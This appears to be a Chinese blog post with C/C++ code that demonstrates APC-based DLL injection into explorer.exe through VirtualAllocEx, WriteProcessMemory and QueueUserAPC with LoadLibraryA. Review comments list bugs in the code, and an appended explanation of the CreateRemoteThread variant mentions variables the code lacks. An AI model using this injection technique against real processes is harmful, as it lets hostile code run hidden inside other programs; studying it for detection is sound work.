continue my dream
阿新 • • 發佈:2019-01-24
/*
 * Blog demonstration of loading a DLL into another process: the DLL's path is
 * written into the target's address space and LoadLibraryA is queued as a
 * user-mode APC on each of the target's threads.  From a defender's point of
 * view the call sequence below (OpenProcess with PROCESS_ALL_ACCESS,
 * VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, OpenThread,
 * QueueUserAPC targeting LoadLibraryA) is the well-known "APC injection"
 * pattern and is exactly the cross-process activity that EDR hooks and ETW
 * telemetry are built to surface; hardened processes / mitigation policies
 * and least-privilege accounts are the usual containment.
 *
 * NOTE(review): the file uses `bool`, `true`, `false` without <stdbool.h> and
 * has a non-constant file-scope initializer below, so it only builds as C++
 * (or a C dialect with those extensions) — confirm the intended toolchain.
 */
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "Winbase.h"

/* Signature of kernel32!OpenThread(dwDesiredAccess, bInheritHandle, dwThreadId). */
typedef HANDLE (WINAPI *_OPENTHREAD)(DWORD,BOOL,DWORD);

/*
 * OpenThread is resolved at run time via GetProcAddress instead of being
 * linked statically.  NOTE(review): this global is named exactly like the
 * Win32 API; SDKs whose headers already declare OpenThread will report a
 * conflicting declaration here — verify against the SDK in use.  The result
 * of GetProcAddress is never checked for NULL before it is called below.
 */
_OPENTHREAD OpenThread=(_OPENTHREAD)GetProcAddress(GetModuleHandle(("Kernel32.dll")),"OpenThread");

/* Capacity of the DLL-path buffer (bytes). */
#define def_buf_size 1024

/* Full path of the DLL to load; filled in by main() and copied verbatim into the target. */
char szFullpath[def_buf_size]={0};

/*
 * Look up a process id by executable name.
 *
 * pProcessName: executable file name to match against PROCESSENTRY32.szExeFile
 *               (case-sensitive, exact strcmp match).
 * Returns the th32ProcessID of the first matching process, or -1 if none.
 *
 * NOTE(review): the return of CreateToolhelp32Snapshot is not checked, and the
 * snapshot handle is never passed to CloseHandle on any path (handle leak).
 */
int GetProcessPid(char *pProcessName)
{
    HANDLE handle;
    PROCESSENTRY32 pe;
    BOOL bRet;
    handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    bRet=Process32First(handle,&pe);
    while (bRet)
    {
        if (strcmp(pProcessName,pe.szExeFile)==0)
        {
            /* First match wins; the snapshot handle is leaked here. */
            return pe.th32ProcessID;
        }
        else
        {
            bRet=Process32Next(handle,&pe);
        }
    }
    /* No process with that name was found. */
    return -1;
}

/*
 * Copy szFullpath into the target process and queue LoadLibraryA as an APC on
 * every thread owned by the target.
 *
 * dwProcessid: target process id (main() passes GetProcessPid's result
 *              straight through, so a -1 "not found" arrives here as 0xFFFFFFFF).
 * Returns true when QueueUserAPC reported success for at least one thread,
 * false when the path could not be written or the thread snapshot failed.
 *
 * NOTE(review): `bRet` is only assigned when both OpenProcess and
 * VirtualAllocEx succeed, so the `if (!bRet)` test below reads an
 * uninitialized variable on the failure paths (undefined behavior).
 * NOTE(review): `sizeof(szFullpath)+1` reads one byte past the end of the
 * 1024-byte global when passed to WriteProcessMemory.
 */
bool injectModulToProcess(DWORD dwProcessid)
{
    HANDLE handle;
    LPVOID lpData;
    DWORD dwResult;
    bool bRet;
    handle=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessid);
    if (handle)
    {
        /* Remote RWX allocation large enough for the path buffer plus one byte. */
        lpData=VirtualAllocEx(handle,NULL,sizeof(szFullpath)+1,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        if (lpData)
        {
            /* dwResult receives the number of bytes written; it is reused below for QueueUserAPC. */
            bRet=WriteProcessMemory(handle,lpData,(LPVOID)szFullpath,sizeof(szFullpath)+1,&dwResult);
        }
        /* The process handle is released here; the remote allocation itself persists. */
        CloseHandle(handle);
    }
    if (!bRet)
    {
        return false;
    }
    /* dwSize is the first member, so this initializer sets te.dwSize. */
    THREADENTRY32 te={sizeof(THREADENTRY32)};
    HANDLE handleSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
    if (handleSnap== INVALID_HANDLE_VALUE)
    {
        return false;
    }
    bool bStat=false;
    if (Thread32First(handleSnap,&te))
    {
        do
        {
            /* The snapshot is system-wide; keep only threads owned by the target. */
            if (te.th32OwnerProcessID==dwProcessid)
            {
                HANDLE handleThread=OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
                if (handleThread)
                {
                    /* lpData (the remote path) becomes LoadLibraryA's argument. */
                    dwResult=QueueUserAPC((PAPCFUNC)LoadLibraryA,handleThread,lpData);
                    if (dwResult>0)
                    {
                        bStat=true;
                    }
                    CloseHandle(handleThread);
                }
            }
            /* No break: the APC is queued on every thread of the target, not just the first. */
        } while (Thread32Next(handleSnap,&te));
    }
    CloseHandle(handleSnap);
    return bStat;
}

/*
 * Build the DLL path from the current directory and run the injection against
 * the process named in szProcessname.
 *
 * NOTE(review): GetCurrentDirectory may fill up to def_buf_size bytes and the
 * following strcat appends "\\Dlltest.dll" with no length check, so a long
 * directory name overflows szFullpath.  GetProcessPid's -1 result is not
 * checked before being passed on.
 */
int main()
{
    GetCurrentDirectory(def_buf_size,szFullpath);
    strcat(szFullpath,"\\Dlltest.dll");
    char szProcessname[64]="explorer.exe";
    if (!injectModulToProcess(GetProcessPid(szProcessname)))
    {
        /* "<path> injection failed" */
        printf("%s注入失敗",szFullpath);
    }
    else
    {
        /* "<path> injection succeeded" */
        printf("%s注入成功",szFullpath);
    }
    return 0;
}
提示:
所謂DLL注入就是將一個DLL放進某個程序的地址空間裡,讓它成為那個程序的一部分。要實現DLL注入,首先需要開啟目標程序。
hRemoteProcess = OpenProcess(
    PROCESS_CREATE_THREAD |   //允許遠端建立執行緒
    PROCESS_VM_OPERATION |    //允許遠端VM操作
    PROCESS_VM_WRITE,         //允許遠端VM寫
    FALSE,
    dwRemoteProcessId
)
由於我們後面需要寫入遠端程序的記憶體地址空間並建立遠端執行緒,所以需要申請足夠的許可權(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。OK,現在目標程序也認識pszLibFileRemote了,但是pfnStartAddr好像不好辦,我怎麼可能知道LoadLibraryA在目標程序中的地址呢?其實Windows為我們解決了這個問題,LoadLibraryA這個函式是在Kernel32.dll這個核心DLL裡的,而這個DLL很特殊,不管對於哪個程序,Windows總是把它載入到相同的地址上去。因此你的程序中LoadLibraryA的地址和目標程序中LoadLibraryA的地址是相同的(其實,這個DLL裡的所有函式都是如此)。至此,DLL注入結束了。